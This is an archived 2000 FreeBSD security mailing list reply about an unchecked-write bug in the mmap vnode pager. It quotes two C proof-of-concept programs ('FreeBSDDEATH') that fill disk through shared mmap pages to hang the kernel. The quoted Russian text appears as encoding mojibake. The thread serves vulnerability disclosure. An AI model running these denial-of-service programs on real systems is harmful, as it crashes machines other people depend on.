Date: Fri, 2 Jun 2000 12:04:50 -0700 (PDT) From: Sergio Valdes-Flores <sergiovf@excite.com> To: freebsd-security@freebsd.org Subject: Re: FreeBSDDEATH.c.txt (mmap dirty page no check bug) Message-ID: <21786238.959972690834.JavaMail.imail@knuckles.excite.com>
next in thread | raw e-mail | index | archive | help
http://ls.si.ru/tmp/FreeBSDDEATH-2.c (dash not dot) this is the page: ----------------- /* From: <mike@haali.po.cs.msu.su> Create 1GB file, fill it with 1s. The kernel (may|will) hang. */ int main(int argc,char **argv) { int pages=3D256*1024; char *p; int fd,i; char filename[]=3D"./junk.XXXXXXXX"; fd=3Dmkstemp(filename); ftruncate(fd,pages*4096); =20 p=3D(char*)mmap(NULL,pages*4096,PROT_READ|PROT_WRITE,MAP_SHARED|MAP_NOSYNC,= fd,0); for (i=3D0;i<pages;i++) memset(p+i*4096,1,4096); munmap(p,pages*4096); close(fd); return 0; } _--------------------- On Fri, 2 Jun 2000 14:09:06 +0100, User Datagram Protocol wrote: > Yo, > =20 > This seems to be doing the rounds with the script kiddies fairly quickly= . > I've attached it. > (originally found at: http://ls.si.ru/tmp/FreeBSDDEATH.c.txt - dumped > by some skr1pt k1dd1es on irc) > =20 > vnode_pager_putpages() only does this check against the return value of > VOP_PUTPAGES(): > rtval =3D VOP_PUTPAGES(vp, m, bytes, sync, rtvals, 0); > if (rtval =3D=3D EOPNOTSUPP) { > =20 > And vnode_pager_generic_putpages() appears to force the return value for > all page writes that it does to VM_PAGER_OK even when an error occurs in > VOP_WRITE(). > =20 > The above is based on a quick inspection of the 4.0-STABLE fork source tree. > So, this guy has a point. > =20 > Apologies if this issue was posted to any other lists, but it came my way, > I am not currently on bugtraq due to some mail issues, and it looks like > something we should be aware of (albeit really a quality of implementation > issue that gets hit during times of high load - like something else I have > in the pipeline. Heh.) > =20 > Regards > --=20 > Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer > WWW: www.closed-networks.com/~udp=20 > Dundee =20 www.packetfactory.net/~udp > United Kingdom email: =20 udp@closed-networks.com > /* > From: Oleg Derevenetz <Oleg.Derevenetz@p4.f3.n5025.z2.fidonet.org> > Date: Wed, 31 May 2000 19:04:12 +0400 > Subject: mmap > Message-ID: <959790285@p4.f3.n5025.z2.ftn> > =20 > Draft English translation: in vnode_pager.c there is no any check for > errors on write of ditry mmap'ed pages to disk. If there is no enough > space or any other I/O error occur, the results will be very bad. > =20 > It will be good to kill the calling process, but it's hard to find out > the owner of offending page. > =20 > =E4=C5=CC=CF =D7 =D4=CF=CD, =DE=D4=CF =D7 vnode_pager.c =CE=C5 =D0=D2=C5= =C4=D5=D3=CD=CF=D4=D2=C5=CE=C1 =CE=C9=CB=C1=CB=C1=D1 =CF=C2=D2=C1=C2=CF=D4= =CB=C1 > =CF=DB=C9=C2=CF=CB =D0=D2=C9 =D3=C2=D2=CF=D3=C5 =C7=D2=D1=DA=CE=D9=C8 mm= ap'=CC=C5=CE=CE=D9=C8 =D3=D4=D2=C1=CE=C9=C3 =C6=C1=CA=CC=C1 =CE=C1 =C4=C9= =D3=CB, =C5=D3=CC=C9 =CE=C1 > =C4=C9=D3=CB=C5 =CE=C5=C4=CF=D3=D4=C1=D4=CF=DE=CE=CF =CD=C5=D3=D4=C1 =C4= =CC=D1 =D4=C1=CB=CF=C7=CF =D3=C2=D2=CF=D3=C1 (=C4=C1 =C9 =D7=CF=CF=C2=DD=C5= =D0=D2=C9 =CC=C0=C2=CF=CA =CF=DB=C9=C2=CB=C5 > I/O), =C9 =DC=D4=CF =D0=D2=C9=D7=CF=C4=C9=D4 =CB =CF=DE=C5=CE=D8 =D0=CC= =CF=C8=C9=CD =D2=C5=DA=D5=CC=D8=D4=C1=D4=C1=CD. =E7=C4=C5-=D4=CF =D0=CF=CC= =C7=CF=C4=C1 =CE=C1=DA=C1=C4 =D1 > =D0=C5=D2=C5=D0=C9=D3=D9=D7=C1=CC=D3=D1 =D3 =CC=C0=C4=D8=CD=C9 =C9=DA fr= eebsd.hackers, =CF=CE=C9 =CD=C5=CE=D1 =D0=CF =C2=CF=CC=D8=DB=CF=CD=D5 =D3= =DE=C5=D4=D5 > =D0=D2=CF=D3=D4=CF =D0=CF=D3=CC=C1=CC=C9. VM =D3=C4=C5=CC=C1=CE=C1 =C4= =CF=D3=D4=C1=D4=CF=DE=CE=CF =CB=D2=C9=D7=CF, =D0=CF=DC=D4=CF=CD=D5 =CD=CE= =C5 =D0=D2=C9=C4=D5=CD=C1=D4=D8 > =D2=C5=C1=CB=C3=C9=C0 =CE=C1 =D4=C1=CB=D5=C0 =D0=D2=CF=C2=CC=C5=CD=D5 = =D0=CF=CB=C1 =CE=C5 =D5=C4=C1=CC=CF=D3=D8. =F6=C5=CC=C1=D4=C5=CC=D8=CE=CF = =C2=D9=CC=CF =C2=D9 =D0=D2=C9=C2=C9=D4=D8 > =D0=D2=CF=C3=C5=D3=D3, =CE=CF =C9=DA=D7=CC=C5=DE=D8 =C9=CE=C6=CF=D2=CD= =C1=C3=C9=C0 =CF =D4=CF=CD, =CB=C1=CB=CF=CD=D5 =D0=D2=CF=C3=C5=D3=D3=D5 =D0= =D2=C9=CE=C1=C4=CC=C5=D6=C9=D4 > =D3=D4=D2=C1=CE=C9=C3=C1, =D0=D2=C9 =D3=C2=D2=CF=D3=C5 =CB=CF=D4=CF=D2= =CF=CA =D0=D2=CF=C9=DA=CF=DB=CC=C1 =CF=DB=C9=C2=CB=C1, =D7=C5=D3=D8=CD=C1 = =DA=C1=D4=D2=D5=C4=CE=C9=D4=C5=CC=D8=CE=CF. > =F7=CF=D4 =D3=C9=D6=D5 =D3=C5=CA=DE=C1=D3, =CC=CF=CD=C1=C0 =C7=CF=CC=CF= =D7=D5, =DE=D4=CF =C4=C5=CC=C1=D4=D8... > =20 > =EB=D3=D4=C1=D4=C9, =C1 =DA=C4=C5=D3=D8 =CE=C9=CB=D4=CF =CE=C5 =DA=C1=CE= =C9=CD=C1=C5=D4=D3=D1 =D1=C4=C5=D2=CE=D9=CD VM ? > */ > =20 > #include <sys/types.h> > #include <sys/mman.h> > #include <stdio.h> > #include <string.h> > #include <fcntl.h> > #include <errno.h> > =20 > #define COUNT 1024*1024 > #define SIZE 10*1024*1024 > =20 > int main () { > int i,j,fd; > char *fptr, fname [16]; > =20 > for (i=3D0;i<COUNT;i++) { > sprintf (fname, "%d", i); > printf ("DEBUG: fname: %s\n", fname); fflush (stdout); > =20 > fd=3Dopen (fname, O_RDWR|O_CREAT, 644); > lseek (fd, SIZE, SEEK_SET); > write (fd, "-", 1); > printf ("DEBUG: write\n"); fflush (stdout); > =20 > if ((fptr=3Dmmap (NULL, SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, = fd, > 0))=3D=3DMAP_FAILED) { > printf ("mmap() failed !\n"); fflush (stdout); > return 0; > } > printf ("DEBUG: mmap, errno=3D%d\n", errno); fflush (stdout); > =20 > for (j=3D0;j<SIZE;j++) > fptr[j]=3D'o'; > printf ("DEBUG: fill\n"); fflush (stdout); > } > =20 > return 0; > } _______________________________________________________ Get 100% FREE Internet Access powered by Excite Visit http://freelane.excite.com/freeisp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?21786238.959972690834.JavaMail.imail>